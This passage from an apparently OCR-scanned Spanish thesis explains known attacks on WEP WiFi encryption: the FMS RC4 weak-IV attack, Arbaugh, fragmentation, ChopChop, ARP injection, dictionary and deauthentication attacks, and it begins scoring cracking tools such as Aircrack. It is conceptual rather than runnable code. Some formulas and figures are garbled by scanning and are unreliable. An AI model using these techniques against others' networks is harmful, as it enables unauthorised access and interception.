clave permitiendo el acceso total a la red inalambrica y a los datos que por ella circulan. Son 
muchos los estudios posteriores que se han realizado a partir de la investigacion de Fluhrer, 
Mantin y Shamir et al, y que mejoran su trabajo reduciendo el tiempo de recuperacion de la 
clave. Basicamente esta vulnerabilidad se centra en el modo de operacion de RC4 y sus dos 
modulos KSA y PNRG ya comentados en secciones anteriores. 

El estudio demuestra matematicamente la existencia de un vulnerabilidad en la fase 
KSA del algoritmo RC4. Trataremos de evitar la complejidad matematica asumiendo algunos 
hechos que pueden ser consultados y analizados mas afondo en el articulo de FMS. Pues bien, 
pasemos a definir que es lo que hace tan vulnerable a este algoritmo de cifrado, estableciendo 
dos premisas claves. En primera instancia como ya sabemos, todo texto piano a trasmitir lleva 
como prefijo 3 bytes del vector de inicializacion rv y que hacen unica a la trama. Por otra 
parte FMS observaron mediante el estudio del trafico de una red 802. 11, que los tres primeros 
bytes de la trama en texto piano generalmente son los mismos 0xAA:0xAA:0x03. Dichos 
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bytes son los pertenecientes a la cabecera SNAP (Subnetwort Access Protocol) y que 
identifican al protocolo. Dadas estas dos premisas FMS analizaron la relacion que existia 
entre los IVs de la cadena que conforma la entrada al algoritmo KSA y la clave maestra de 
cifrado, observado que ciertos IVs reflejaban informacion a cerca de dicha clave, asi pues a 
estos vectores de inicializacion los llamaron WeaklV o IVs debiles. Pudieron llegar a la 
conclusion, y esto se reserva como consulta a su articulo [referenda], que los IVs debiles 
tenian la forma [A+3, 255, X], donde A es el indice del primer byte de la clave maestra y X es 
un valor cualquiera. Asi pues para un valor de "A = 0" estariamos haciendo referenda al 
primer byte de la contrasefia. Como ya comentamos anteriormente estos 3 bytes de forma 
caracteristica, son concatenados a la clave maestra formando la cadena de entrada al 
algoritmo KSA, asi pues para una encriptacion WEP de 64 bits tendria como vector de 
entrada la siguiente cadena [A+3, 255,X,?, ?,?,?,?]. Donde "?" representan la clave que tanto la 
estacion como el AP conocen. Cabe destacar que para una encriptacion de 128 bits los 
caracteres "?" se extenderian hasta 13. 

Concentrarnos ahora en el desordenamiento del algoritmo KSA cuyo codigo se puede 
observar a continuacion. 



KSA 

for i = to 255 

S[i] := i 
j:=0 
for i = to 255 

j := (j + S[i] + Clavep mod "tamanodelaclave"]) mod 256 
lntercambia(S[i],S[j]) 



1 Mecanismo para multiplexar redes usando IEEE802.2 LLC 
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Principalmente esta compuesto por dos bucles, un primer bucle que inicializa un 
vector de enteros S, muy importante como posteriormente veremos y una segunda iteracion 
que tiene como objetivo desordenar el vector anterior en funcion de la clave maestra. En este 
caso el valor de la variable "tamanodelaclave" sera 5 para 64 bits y 16 para 128 bits. 
Realicemos una pequena traza de las tres primeras iteraciones que nos ayudaran a comprender 
su funcionamiento. En el estado inicial, tras la inicializacion del vector S el valor de las 
variables es el siguiente. 

Clave[]: (A+3, 255,X, Clave[3], ... , Clave[A+3], ...) 

S[]: (0, 1, 2, ..., A+3, ...255) 

Partiendo de este estado vamos a aplicar las tres primeras iteraciones para observar el 
comportamiento del algoritmo. 

Iteracion 

i = 

j = + + Clave[0] = A+3 

S[]=(A+3,1,2,...,0,...) 



Iteracion 1 
i = l 

j = (A+3) + 1 + 255 = A+3 # Ya que se aplica "j mod 256" 
S[]= (A+3, 0,2, ...,!,...) 
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Iteracion 2 

i = 2 

j = (A+3) + 2 + X 

S[]=(A+3,0,s[j],..., 1,...) 



La ultima iteracion del bucle corresponde al valor desordenado de S para S2. Cabe 
destacar que tan solo podremos calcular el valor de Clave[A] si conocemos los Clave[i] 
anteriores. En este caso hemos logrado simular correctamente hasta SA+2 para A=0 debido a 
que los valores de las variables son conocidos, es decir todavia no ha entrado en juego la 
clave. La siguiente iteracion seria pues la A+3 =3. Asi pues el desarrollo seria el siguiente. 

Iteracion A+3 

iA+3 = A+3 

jA+3 = j2 + SA+2[A+3] + Clave [A+3] 

S[]=(A+3,A+3,0,S[2],...,S[j],...) 



En estos momentos el valor de la variable j ya depende de los bytes clave 
preestablecida y por lo tanto no podriamos seguir conociendo cual es el siguiente valor ya que 
nos es desconocido. Despejemos ahora la variable Clave[] y veamos que conocemos y que 
desconocemos de la ecuacion. 



Clave[A+3] = jA+3 - j2 - SA+2[A+3] 
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En esta iteracion desconocemos el valor de Clave[A+3] (evidentemente es nuestro 
objetivo) y el valor jA+3 , el resto "j2 - SA+2[A+3]" es conocido. Centremonos en tratar de 
averiguar cual es el valor de jA+3 . En este momento sabemos que se ha de realizar la 
permutacion del bucle asi pues el valor de SA+3[A+3] ha de ser sustituido por el valor de 
SA+2[jA+3] (el valor del vector S resultado de la iteracion anterior, con el nuevo indice a 
calcular y que desconocemos). Recordemos que necesitamos determinar jA+3 para poder 
averiguar el byte de la clave. Es evidente que si conocieramos el valor de SA+3[A+3] 
podriamos averigua el ansioso jA+3 sustituyendo en la iteracion anterior. Pero, ^podemos 
conocer el valor de SA+3[A+3] ?. Aqui es donde entra en juego el segundo modulo de RC4, 
el algoritmo PRGN y que es mostrado y comentado a continuacion. 



PRGN 

i :=0 
j:=0 

Mientras GeneraUnByte: 
i := (i + 1) mod 256 

j:=G + S[i])mod256 
lntercambia(S[i],S[j]) 
Salida S[(S[i] + S[j]) mod 256] 
FinMientras 



Para la iteracion A+3 lo que devolveria el PRGN seria S[S[0] + S[l]] = S[A+3 + 0] = 

S[A+3]. Nuestro ansiado S A+3 [A+3]. Pero, ^que probabilidad existe de que los 
valores de S[0], S[l] y S[A+3] permanezcan quietos una vez el algoritmo KSA haya 
terminado el barajado?. En este momento entra en juego la estadistica, FMS calcularon 
mediante la formula 
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A + 3 




1 



\ 



256 



que un 5% de las veces dichos valores no se veian alterado, mientras que un 95% no residian 
en las posiciones deseadas. Esto aunque no lo parezca es un dato muy alentador en cuanto a la 
ruptura del algoritmo se refiere, ya que con una cantidad muy grande de paquetes (del orden 
de 2000000) se puede detectar que el valor que devuelve el PRNG es nuestro S A+3 [A+3]. 

En este momento recordemos una de las dos premisas que presentamos al comienzo 
del analisis y es que conocemos el texto piano del primer byte del paquete ya que corresponde 
con el valor OxAA. Realizando un a XOR de ese byte con el primer byte encriptado podemos 
conocer un 5% de las veces el valor de S A+3 [A+3]. Retrocediendo aun mas con este valor 
podemos calcular el jA+3 y con ello determinar el valor de Clave[A+3]. 

Una vez determinado el byte A podemos ir incrementando el valor del incide (A+l) 
para buscar el siguiente byte de la clave [A+3+1, 255, X] y vuelta a empezar. Poco a poco 
incrementaremos el valor de A averiguando por completo el total del vector Clave[]. 

Existen posteriores mejoras del algoritmo FMS que identifican un mayor numero de 
IVs debiles y que producen como resultado una determinacion de la clave con un menor 
numero de paquetes. Personas como Korek introdujeron nuevas capacidades al algoritmo 
permitiendo la recuperacion de una clave de 128 bits con 800000 IVs y de una de 65bits con 
200000 IVs. 

No obstante se ha seguido trabajando en la mejora de este algoritmo, la universidad de 
Darmstadt y su departamento de criptologia ha conseguido rebajar el numero de paquetes 
considerablemente mediante la creacion de la herramienta PTW. Haciendo uso de su 
aplicacion es posible conseguir la clave de cifrado (128 bits ) con tan solo 50000 Ivs. Mas 
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informacion acerca de la metodologia empleada puede consultarse en el paper Tews, E. 
Weinmann, R. y Pyshkin, A. "Braking 104 bit WEP in less than 60 seconds" 



5.1.1.2 Ataques inductwos 
Arbaugh 

El ataque Arbaugh toma el nombre de su creador que en Marzo de 2001 (Arbaugh, W., 
Shankar, N., Wan, J, (2001) paper "Your 802.11 Wireless Network has No Clothes") 
consiguio crear una metodologia para obtener el conjunto de palabras que formaban el 
lenguaje de las cadenas de encriptacion (Keystream) para una clave compartida dada. Puesto 
que la cadena de cifrado depende del IV utilizado y de la contrasefia precompartida, Arbaugh 
consigue completar una tabla con la relacion IV -Keystream obteniendo la posibilidad de cifrar 
y descifrar cadenas del texto piano sin conocer la clave precompartida. Cabe destacar el hecho 
de que cada cadena a cifrar puede tener distinta longitud, es por eso que surge la necesidad de 
calcular el Keystream menor o igual que el MTU maximo de una trama 802.11, que segun el 
RFC 802.11 es de 2346 bytes. Cabe destacar que este valor es el definido por el estandar 
802. 1 1 pero no el utilizado en su implementacion, ya que para compatibilizar la norma 802. 1 1 
con la 802.3 se opto por utilizar un MTU de 1500 bytes . 

Para ello Arbaugh parte de un caso base por el cual dado un texto piano conocido y su 
posterior cifrado es posible, aplicando la funcion XOR recuperar la cadena de cifrado 
(Keystream). Como ya sabemos dicha cadena tan solo nos es de utilidad si se cifra con el IV 
correspondiente. Arbaugh uso como texto piano conocido, mensajes DHCPDIS COVER del 
que se es conocedor de los campos que conforman la trama, direcciones de la cabecera de 
origen y destino, direcciones MAC, tamafio de la trama, etc. Para acelerar el proceso es 
posible utilizar varias tecnicas como, enviar Spam desde Internet a una estacion asociada al 
AP o conseguir que la victima te remita un correo electronico. 

A continuacion Arbaugh construye un datagrama de tamano n-3 , donde n es la 
longitud en bytes de la cadena de cifrado previamente calculada. Este datagrama puede ser 
una peticion ARP, un paquete UDP, ICMP, de texto piano conocido. Seguidamente calcula el 
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ICV del paquete y le concatena tan solo los 3 ultimos bytes del CRC32, para posteriormente 
realizar la operacion XOR con la cadena de cifrado (keystream), cabe destacar que ambas 
cadenas tienen longitud n, pero el texto piano a cifrar carece del ultimo byte del ICV. A 
continuacion se concatenara a la cadena cifrada un ultimo byte correspondiente al ICV 
formando una trama de tamano n+1. Asi pues mediante un ejercicio de prueba y error 
calcularemos ese valor remitiendo al AP la trama estimada, si el punto de acceso contesta con 
una retransmision de la misma, significa que la estimacion ha sido acertada. La siguiente 
imagen ilustra el proceso realizado para la determinacion del ultimo byte del keystream. 



e 
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Figura 5. 1: Ataque indue tivo Arbaugh 



Asi pues poco a poco podemos calcular integramente todo el keystream para un IV 
dado, hasta la longitud marcada por la MTU (Maximum Transfer Unit) o tamano maximo de 
trama. Repitiendo iterativamente el proceso es posible calcular la tabla completa de IVs que 
conformarian el lenguaje de cifrado, utilizando la clave secreta compartida. 
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Fragmentacion 



A principios del 2006 Bittau, A., Handley, M., Lackey , J. en su paper "The Final Nail 
in WEP's Coffin " presentaron una nueva vulnerabilidad en el protocolo de seguridad WEP la 
cual permitia principalmente conseguir dos objetivos, encriptar datos validos para 
posteriormente ser enviados a la red y desencriptar paquetes de datos utilizando elementos 
externos. El primero de ellos constituye la posibilidad de acelerar el envio de tramas a la red 
con el objetivo de explotar la vulnerabilidad en los IVs debiles comentada en la seccion 
anterior, ya que es posible construir un paquete valido inyectable en la red, mediante una 
operacion XOR del texto piano con el keystream. Mientras que el segundo permite que un 
tercer elemento controlado por el atacante conozca el contenido en claro de un paquete. 

Para explotar la mencionada carencia de seguridad se valieron de una funcionalidad 
inherente en el estandar 802.11 que es la fragmentacion de paquetes. La capa MAC del 
estandar IEEE802.il permite fragmentar la informacion a transmitir para asi evitar o reducir 
posibles interferencias de la senal radio. 

Asi pues, para conseguir una cadena de cifrado (keystream) de longitud igual o menor 
que el MTU y que sea aceptada por el AP como datos validos, utilizaron la posibilidad de 
conocer informacion en claro de una trama. Como ya hemos visto, un datagrama IP 
encapsulado en una trama MAC contiene habitualmente la misma cabecera, perteneciente a la 
subcapa LLC/SNAP. 



Cabecera 802.11 


OxAA 


OxAA 


0x03 


0x00 


0x00 


0x00 


0x08 


0x00 



Por lo tanto la cadena de cifrado (keystream) sera el resultado de aplicar la operacion 
XOR entre la cadena encriptada recibida y el texto piano conocido. 

Hasta ahora, conocemos de cada paquete cifrado 8 bytes del texto piano, esto nos 
permite forjar tramas de pequeno tamano para su posterior transmision. Pero, ^como podemos 
inyectar tramas de mayor tamano?, en este momento es donde entra en juego la 
fragmentacion, dada una cadena de datos menor o igual que la MTU, es posible dividirla en 
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paquetes de 8 bytes y ser encriptados con el keystream conocido, el AP una vez recibida la 
trama la ensamblara y la transmitira al medio utilizando para ello una nueva clave de cifrado. 
Para ello se utilizara una trama broadcast. Dado que conocemos el texto piano remitido y 
podemos capturar el nuevo paquete cifrado, estamos en disposition de calcular mediante el 
uso de XOR la cadena de cifrado de longitud n menor que la MTU. 

La siguiente figura muestra el proceso de division de un paquete de longitud mayor 
que 8 bytes, en pequefios paquetes de 8 bytes. El valor de "x" en la figura representa el IV en 
claro que es comun a todos los paquetes. 

Data CRC32 



Fragments & CRC 
Keystream (IV x). 
Encrypted frags. 



&CRC. 


abed efgh 


1234 




S ^ 






abed 1983 


efgh 1914 




■ 


■■•■ 




1234 5678 


1234 5678 | 




= lv 


X 


29118305 J 


1337 6667 



Figura 5.2: Proceso de fragmentacion 1 

El proceso de ensamblado y encriptacion realizado por el AP es el que se describe a 
continuation en la siguiente imagen. 



IV 



Data CRC 



Encrypted frags. 



2911 



8305 



1337 



S67 



De-crypt & reassemble. 
Calculate entire CRC. 

Keystream for IV y. 
Relayed pay load. 



abed efgh 



1234 



3141 5926 5358 



y 


2718 2818 


2845 



Figura 5.3: Proceso de fragmentacion 2 
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Como se puede apreciar el AP desencripta y ensambla la informacion, recuperando el 
texto piano. A continuacion calcula el nuevo ICV de la trama y la encriptada usando un IV 
"y" diferente al remitido por el atacante forjando una nueva keystream de longitud menor al 
MTU. En este momento estamos capacitados de crear cualquier trama valida aceptada por el 
AP n < MTU. Pero ^que ocurre si queremos calcular una keystream de igual tamano que la 
MTU?, deberemos completar la cadena de cifrado hasta el tamano comentado. Para ello 
utilizaremos la tecnica utilizada por Arbaugh de induccion mediante prueba y error. 

Dado un keystream valido calculado previamente de tamano n < MTU la propuesta de 
Bittau, Handley y Lackey, es probar por fuerza bruta una cadena de cifrado de n+1 bytes, 
donde el valor del ultimo byte tomara valores entre [0-255]. Para ello se establece el byte n+1 
a 00 y se envia al AP , si el AP reenvia el paquete quiere decir que la aproximacion era 
correcta, si no lo fuera se procederia a probar con 01 y asi sucesivamente. Este metodo 
repetido iterativamente consigue determinar un keystream de 1500 bytes, que coincide con la 
MTU establecida para 802.11, aplicando el proceso para cada IV y keystream posible 
podemos construir una tabla de correspondencia IV-Cadena de cifrado, consiguiendo asi 
poder desencriptar cualquier paquete de la red sin conocer la clave compartida. 

Todo el proceso descrito hasta ahora permite obtener una clave de cifrado valida, para 
un posterior proceso de descodificacion local. A continuacion los tres autores propusieron una 
metodologia para desencriptar cualquier paquete de la red en tiempo real con la ayuda de una 
tercera estacion situada en Internet. Para poder enviar un paquete a una direccion de Internet 
es necesario conocer dos datos fundamentales, la MAC del router y una IP origen valida, 
dependiendo de la implementacion esta ultima puede no ser necesaria. Por lo que respecta a la 
MAC de router , en la mayoria de los casos el propio AP implementa funciones de enrutado, 
es inmediato pues capturar la MAC del dispositivo ya que se transmite en claro en cualquier 
paquete. En el supuesto de que el AP no permita enrutar datagramas es posible inferir la 
direccion observando el trafico de la red, normalmente la MAC destino mas utilizada sera el 
candidato a ser el router de la red. Una vez establecidos estos dos parametros es posible forjar 
por fragmentation dos paquetes 802.11, uno que contenga la cabecera de la direccion IP del 
host de Internet y otro con el paquete de datos encriptado que deseamos descodificar. Asi 
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pues cuando el AP reciba los dos fragmentos procedera a desencriptar la informacion, para a 
continuacion ensamblar las tramas y remitirlas al host de Internet en claro. De esta manera el 
atacante que controla el equipo en Internet, puede desencriptar en tiempo real la informacion 
que circula por la red. La siguiente figura ilustra el proceso. 



." 



IP Header 



IV Data 


* 5138 3770 




z 5138 3770 



IP Header seib ello 



Encrypted 
pay load. 

IP header & 
pay load frags. 

De -crypt, reassemble 
& send to Internet. 



Figura 5.4: Proceso de fragmentacion 3 

ChopChop 

En Noviembre de 2004 un Hacker que se hace llamar "KoreK" presenta en la pagina 
oficial de Netstumbler la implementacion de un nuevo ataque basado en los trabajos de 
Arbaugh. Esta nueva tecnica basada en induccion permite descifrar un paquete de datos WEP 
sin ser conocedor de la clave de cifrado, obteniendo como resultado no solo el paquete en 
claro sino tambien la cadena de cifrado, permitiendo a un atacante forjar un paquete 
cualquiera para ser inyectado en el medio. 

KoreK aprovechando las debilidades comentadas ya del algoritmo de integridad ICV, 
se percato de que si se eliminaba un byte de una trama encriptada mediante WEP es posible 
crear un nuevo mensaje valido aplicando una modificacion relacionada directamente con el 
byte sin encriptar. Tecnicamente a este tipo de ataques se les llama ataque Inverso Arbaugh ya 
que estan basados en sus investigaciones. Como en otros metodos inductivos comentados 
anteriormente, KoreK hace uso de la metodologia de prueba y error para predecir el valor 
correcto de la trama desencriptada. Asi pues lo que intenta determinar es con que valor el ICV 
es validado correctamente, probando con diferentes valores del byte a predecir directamente 
relacionados con el byte en claro. De esta manera se utiliza el ICV y el AP como una especie 
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de oraculo que contestara afirmativamente o negativamente cuando se le remitan tramas de 
longitud M-l donde M es el tamafio en bytes de la trama encriptada capturada. A 
continuacion explicaremos su funcionamiento. 

En primera estancia como se ha comentado se procede a capturar un paquete M y 
eliminarle el ultimo byte de datos convirtiendo la trama resultante en un datagrama no valido 
M-l, para el punto de acceso. Dado que no es conocido el valor del byte en texto piano se 
procede a realizar una estimacion, afortunadamente dicha estimacion tan solo puede tomar 
256 valores diferentes, ya que estamos intentado determinar 1 byte. Asi pues en primera 
instancia se asume que el valor del texto piano es 00 y se crea una mascara de bits que permita 
convertir la trama no valida M-l en una trama M-l valida, aprovechando las debilidades del 
ICV comentadas. A continuacion el paquete es inyectado en la red, observando si es 
reenviado o descartado. En el primer caso la estimacion habra sido correcta mientras que si la 
trama es desechada significa que la estimacion no ha sido acertada. Asumiendo que un 
atacante puede estar monitorizando el medio es posible que pueda observar si la trama ha sido 
retransmitida. Como resultado puede obtener el texto piano del ultimo byte del mensaje M-l y 
de la cadena de cifrado mediante una operacion XOR entre el byte desencriptado y el byte 
encriptado. Repitiendo el proceso para el resto de los bytes es posible determinar la cadena 
original completa. 



5.1.1.3 ATAQUES DE AUTENTICACION 

El proceso de autenticacion ya ha sido comentado en secciones anteriores asi que no 
nos extenderemos en explicar su funcionamiento. Tan solo recordaremos que un punto de 
acceso puede funcionar con dos metodos de autenticacion, autenticacion abierta o 
autenticacion por clave compartida. En el primer caso, el ataque careceria de sentido puesto 
que el AP nos permitiria autenticarnos sin ninguna restriccion de acceso. En el segundo caso, 
el punto de acceso requerira del conocimiento de una clave compartida para la asociacion al 
medio. Para ello el AP lanzara un reto en texto piano a la estacion que a solicitado la 
autenticacion. Este paquete de datos puede ser capturado por una tercera estacion atacante que 
escuche en el mismo canal. Una vez la estacion licita ha recibido el reto, procedera a encriptar 
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el texto piano mediante la clave compartida, enviando el paquete cifrado al punto de acceso. 
Este ultimo comprobara el resultado, comparando la cadena cifrada remitida con el resultado 
de cifrar el mismo texto con su clave. En el momento en que el texto cifrado viaja por el 
medio el atacante puede capturar la respuesta encriptada, siendo conocedor, del texto piano y 
el texto cifrado. A continuacion aplicando la operacion XOR es posible calcular la keystream 
o clave de cifrado. El proceso completo se ilustra a continuacion, la information resaltada en 
color rojo supone los dos datagramas que vulneran el protocolo de autenticacion. 



w 

Client 
attempting 
to connect 



S02.11 Authentication 
Shared Key Steps 

1) Authentication 

request sentto AP 



2) ftP sends challenge text 



3) Client encrypts 
challenge textand 
sends it back to AP 




Access Point (AP) 



| <:<«pW 






4) AP decrypts, and if correct, 
authenticates client 



5) Client connects to network 



QUID 
O. S. rna don 




Figura 5.5: Autenticacion por clave compartida 

Una vez el atacante ha podido determinar una keystream valida, puede proceder a 
pedir autenticacion al AP. El punto de acceso procedera de forma normal remitiendo un reto a 
la estacion ilicita, dicho texto siempre tiene el mismo tamafio 128 bytes, asi pues el atacante 
simplemente realizara la XOR del paquete recibido con la cadena de cifrado capturada. En 
este momento el punto de acceso validara el resultado del reto, asociando a la estacion 
atacante a la red inalambrica. 
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5.1.1.4 Ataques de inyeccion 

Como hemos visto hasta ahora el protocolo de seguridad WEP presenta numerosas 
carencias de seguridad que ponen en entredicho su despliegue y utilizacion en medios donde 
se requiere una seguridad de alto nivel. La carencia de un disefio metodico y robusto llevan a 
este protocolo a aceptar tramas en la red que han sido manipuladas o simplemente inyectadas 
arbitrariamente por estaciones ilicitas. Como ya hemos comprobado anteriormente es posible 
que siendo conocedor de la cadena de cifrado o keystream un atacante pueda forjar su propio 
paquete y ser inyectado en la red sin ninguna oposicion por parte del punto de acceso. Asi 
pues un atacante puede mediante la operacion XOR del keystream y los datos que quiere 
introducir en la red, es capaz de remitir tramas de un tamafio menor o igual a la MTU. Esta 
carencia es debida a que el protocolo no contempla ninguna medida de control ante la llegada 
de paquetes con IV's del mismo valor, asi pues un atacante pude inyectar un datagrama con el 
mismo IV cuantas veces quiera en la red mientras que el proceso de descifrado de la trama sea 
correcto. 

Pero, ^para que nos podria servir esta vulnerabilidad?, pues bien, como hemos 
comentado en secciones anteriores, el ataque estadistico de tipo FSM necesita de una 
cantidad muy grande de trafico en la red, del orden del millon de paquetes para que tenga 
exito. Una estacion que estuviera dentro de la cobertura del AP podria inyectar information 
en la red con la intention de generar gran cantidad trafico, consiguiendo asi numeroso Ws 
debiles. Recordemos que cuantos mas IV's consiga un atacante mayor facilidad tendra para 
calcular la clave de cifrado. 

Tras el estudio del trafico de la red existe cierto trafico que puede ser utilizado para 
ser reinyectado en la red produciendo un aumento de la actividad del medio. Este es el caso de 
los paquetes ARP, estos datagramas son utilizados para resolver direcciones IP dentro de una 
red local. Asi pues cuando un host necesita comunicarse con otro de su misma subred, lanza 
una consulta ARP broadcast preguntando que direccion fisica MAC pertenece a la direccion 
IP a resolver. El host que responde a esa direccion lanza una respuesta unicast con su 
direccion fisica. En ese momento el solicitante incorpora a su tabla ARP dicha 
correspondencia. 
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Pues bien, el ataque de inyeccion consiste en capturar o forjar un paquete ARP valido 
para la subred, es decir que responda a una direccion IP perteneciente a la red, e inyectarlo 
sucesivas ves para producir gran cantidad de trafico en el medio. Para cada peticion ARP 
transmitida al punto de acceso el AP reenviara la trama a la red generando para cada envio un 
nuevo IV. 




Estacion llfcita 




ARPXOR Keystneam 
> 



AP 



000000 



IVe 



AP 




Estacion llfcita 





Figura 5. 6: Inyeccion de paquetes ARP 



En la figura podemos apreciar el proceso de inyeccion de paquetes ARP con destino el 
AP y la consiguiente respuesta generando gran cantidad de IV's. Cabe destacar que existen 
herramientas que consiguen detectar patrones que coincidan con paquetes ARP en las tramas 
cifradas de la red, evitando incluso la operacion de captura de la cadena de cifrado. 

Los primeros antecedentes de una inyeccion en la red fueron realizados por Arbaugh, 
W., en 2001, posteriormente esta tecnica ha sido explotada por casi todos los autores. 
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5.1.1.5 Ataques de diccionario y fuerza bruta 

Las carencias de seguridad en el disefio e implementacion del protocolo de seguridad 
WEP desarrollado por el estandar 802. 1 1 hacen que sea susceptible a ataques de fuerza bruta 
y diccionario. Un ataque de fuerza bruta supone probar reiteradamente el conjunto de palabras 
que forman el lenguaje manejado por el AP para implementar la definicion de la clave 
compartida. Normalmente el alfabeto manejado por el punto de acceso suele ser caracteres 
alfanumericos o caracteres hexadecimales. Por otra parte un ataque de diccionario supondria 
un subconjunto del anterior, es decir un ataque de fuerza bruta utilizando un subconjunto de 
las posibles palabras del lenguaje, normalmente este subconjunto esta formado por cadenas 
presentes en un diccionario y que suelen habitualmente ser utilizadas para definir la clave 
compartida. Cabe destacar el hecho de existen aplicaciones que utilizan alteraciones o 
modificaciones de dichas palabras aumentando el juego cadenas a probar. 

Un atacante podria capturando un solo paquete de datos cifrado aplicar un ataque de 
este tipo con el objetivo de recuperar la clave de cifrado. Para recuperar dicha clave es 
necesario que el secreto compartido este presente en un diccionario o sea generado por fuerza 
bruta mediante reiteradas pruebas. 

Anteriormente hemos especificado el procedimiento de cifrado utilizado por el 
protocolo WEP para transformar una trama en texto piano en una trama encriptada, por lo 
tanto no detallaremos el proceso en profundidad. Recordar simplemente que un datagrama 
cifrado ha sido originado mediante el resultado de la operacion XOR entre la cadena de 
cifrado y el texto piano. La cadena de cifrado a su vez ha sido construida a partir de la 
aplicacion del algoritmo RC4 a la clave de cifrado. 

Una estacion ilicita podria capturar un paquete de datos cifrado y usarlo para obtener 
la clave de cifrado. Asi pues, para cada palabra del lenguaje a probar se encriptara haciendo 
uso del algoritmo RC4 y utilizando el IV de la cadena capturada (este va en claro) generando 
una cadena de cifrado de igual tamano que el paquete encriptado. A continuacion realizando 
la operacion XOR es posible comprobar si los datos obtenidos pertenecen a una cadena 
valida. Repitiendo el proceso iterativamente es posible llegar a determinar la clave de cifrado 
si damos con la palabra del lenguaje correcta. 
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Cabe destacar que el exito de este tipo de ataque dependera del cifrado (64 bits o 128 
bits) aplicado y de la pericia del usuario para establecer la clave de cifrado. En secciones 
posteriores analizaremos el comportamiento de este tipo de ataques. 



5.1.1.6 Ataques de Denegacion de servicio 
Ataques de deautenticaccion 

El principal objetivo de un ataque de deautenticacion es obligar a la estacion asociada 
al AP que vuelva a ejecutar el procedimiento de autenticacion y asociacion. Este tipo de 
vulnerabilidad no esta relacionada directamente con el protocolo WEP, es decir no es una 
carencia de seguridad que haya sido aportada por la implementacion de WEP, sino que es 
inherente al diseno e implementacion del propio estandar 802. 1 1 . 

El motivo por el cual se ha mencionado esta carencia de seguridad en esta seccion es 
porque habitualmente este ataque precede a otros intentos de vulnerar a WEP. Como se ha 
comentado ya, los paquetes de gestion que maneja el estandar IEEE802.il no son cifrados 
por el punto de acceso, esto permite que cualquier estacion pueda construir paquetes de este 
tipo e inyectarlos al punto de acceso. 

Uno de los paquetes de gestion que entrarian dentro de esta categoria son las tramas 
que anuncian que una estacion quiere dejar de pertenecer al punto de acceso. Este tipo de 
paquetes son los llamados paquetes de deautenticacion y conforman una notificacion nunca 
una peticion. Una de sus principales caracteristicas es que pueden ser emitidos tanto por una 
estacion como por el punto de acceso. 
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Figura 5. 7: Trama de deautenticacion 



Como se muestra en la figura un atacante puede forjar un paquete de deautenticacion y 
remitirlo al AP con la direccion MAC de la estacion a deautenticar. Esta accion supone 
inherentemente una desasociacion del punto de acceso impidiendo que la estacion atacada 
pueda transmitir cualquier tipo de informacion por la red. 
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Si una estacion ilicita repitiera este proceso reiteradamente contra una estacion 
asociada al AP esta no podria establecer comunicacion con la red inalambrica puesto es 
imposible que pueda llegar a asociarse. Cabe destacar que esta descuido en el diseno del 
estandar 802. 1 1 puede ser explotada masivamente, es decir es posible introducir como MAC a 
desasociar una direccion broadcast, imposibilitando la conexion de cualquier estacion al punto 
de acceso. 



5.1.2 ESTUDIO PRACTICO DE LA VULNERABILIDAD 

Hasta el momento se ha revisado el conjunto de vulnerabilidades que afectan al 
protocolo de seguridad 802.11 WEP de una forma teorica, estableciendo las debilidades que 
seran puestas en practica en el siguiente punto. 

Para el estudio practico ha sido necesario hacer uso de una serie de herramientas que 
nos ayudaran a implementar las debilidades mencionadas sobre las capturas de datos 
realizadas en el escenario de pruebas. De esta manera la presente seccion establece el proceso 
llevado a cabo para realizar una vulneracion del protocolo de seguridad WEP paso a paso. 
Estableciendo los siguientes aspectos: 

• Escenario de pruebas: se ha identificado los puntos de acceso que seran 
vulnerados, para ello se ha establecido la localization de las pruebas asi como 
detectado los APs. 

• Herramientas utilizadas: tanto Hardware como Software, se ha procedido a 
realizar un analisis de las diferentes aplicaciones que han permitido llevar ala 
practica los diferentes ataques, asi como se ha establecido el material Hardware 
utilizado. 
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• Vulnerabilidades a explotar: en la seccion teorica, se han establecido las 
posibles brechas de seguridad que presenta WEP. Concretamente se han levado 
a la practica las siguientes pruebas: 

o Demostracion de ataques de DoS 

o Demostracion practica del Ataques ChopChop 

o Ejemplo de ataque de Diccionario 

o Implementacion del ataque estadistico 

o Demostracion de un ataque de fragmentacion 

o Ataque de Inyeccion de trafico en la red 

En la red de Internet es posible encontrar numerosas utilidades que permiten acometer 
este estudio practico y que conviene someterlas a un proceso de seleccion segun diversos 
factores. Asi pues a continuacion se definira el criterio de seleccion que se va ha seguir para la 
eleccion de las aplicaciones, el cual seguira un modelo de pesos. 

5.1.2.1 Criterio de seleccion de las herramientas 

Clasificaremos las caracteristicas de la herramienta segun los criterios de la tabla 
siguiente. Para cada caracteristica asignaremos un factor multiplicativo segun su importancia. 
Esto nos permitira ponderar segun el parametro que nos interese. 
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Caracteristica 


Factor multiplicativo 


Comentarios 


Documentacion 


1.3 


Cantidad de documentacion accesible. 


Cumple su cometido 


1.5 


Si la herramienta realiza su cometido 
tras un test previo. 


Velocidad 


1.1 


Velocidad de funcionamiento basada 
en test previos. 


Facilidad de uso 


1.1 


Si presenta o no interfaces 
complicados. 


Ambito de distribucion 


1.1 


Reconocimiento de la comunidad por 
dicha herramienta. 



Tabla 5.1: Criterio de selection de herramientas 

De esta manera realizaremos una valoracion de cada una de las caracteristicas 
mediante un sistema de pesos, es decir estableceremos una puntuacion del 1 al 10 a cada una 
de las herramientas y a cada una de sus caracteristicas. Dicho resultado sera ponderado con el 
factor multiplicativo de la tabla estableciendo una peso final que nos orientara en la seleccion 
de la herramienta. 



5.1.2.2 JUSTIFICACION DE LA ELECCION DE LAS HERRAMIENTAS 

Existen numerosas aplicaciones que nos permiten llevar a la practica los estudios 
realizados hasta el momento, en esta seccion las presentaremos, siendo sometidas a los 
criterios de seleccion definidos. 



Nombre : Suite Aircrack 

Descripcion : Herramienta de analisis de seguridad WEP y WPA, permite realizar numerosos 
ataques, desde DoS (Denegaciones de Servicio) a ataques inductivos o estadisticos. Permite 
recuperar la clave de cifrado. La suite Aircrack esta compuesta por una serie de herramientas 
como Aireplay para la inyeccion de trafico, Airodump para la captura de tramas o Aircrack 
para la ruptura de la clave de cifrado mediante ataques estadisticos. 
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Total Peso : 53 .8 



Caracteristica 


Factor 


Peso 


Resultado 


Documentacion 


1.3 


9 


11.7 


Cumple su cometido 


1.5 


9 


13.5 


Velocidad 


1.1 


9 


9.9 


Facilidad de uso 


1.1 


8 


8.8 


Ambito de distribucion 


1.1 


9 


9.9 



Tabla 5.2: Suite Aircrack 



Nombre : AirSnort 



